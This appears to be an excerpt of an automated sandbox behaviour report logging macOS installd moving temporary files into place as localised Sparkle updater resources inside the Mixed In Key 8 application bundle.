Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/.BC.T_7xGkHw -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/.BC.T_n4Qojb -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/.BC.T_x6cx7W -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/.BC.T_QfjkxF -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/.BC.T_ynnlvT -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/.BC.T_dl4IPw -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/.BC.T_5wHsQw -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/.BC.T_SztlBh -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/.BC.T_lKsfnj -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/.BC.T_HCZFdS -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/.BC.T_k3ZWYs -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/.BC.T_Nv7mjP -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/.BC.T_TBZcw8 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/.BC.T_kdxtkS -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/.BC.T_S6leuI -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/.BC.T_tIoNk2 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/.BC.T_ytND4S -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/.BC.T_UI2NDC -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/.BC.T_QwxH0h -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/.BC.T_Qm4Nft -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/.BC.T_a5Lyy1 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/SUPasswordPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/.BC.T_hz6DmF -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/.BC.T_AkqsMs -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/.BC.T_JGmV6u -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/.BC.T_8QFldP -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/.BC.T_WP9ith -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/SUPasswordPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/.BC.T_Tr7UdS -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/.BC.T_Q7Sctg -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/.BC.T_GeuUSc -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/.BC.T_ekEGWj -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/.BC.T_J1BbJg -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/.BC.T_OrFjOq -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/.BC.T_reJ0Cw -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/.BC.T_3exBp1 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/.BC.T_l242yT -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/.BC.T_u640dB -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/SUUpdateAlert.nib	Jump to behavior
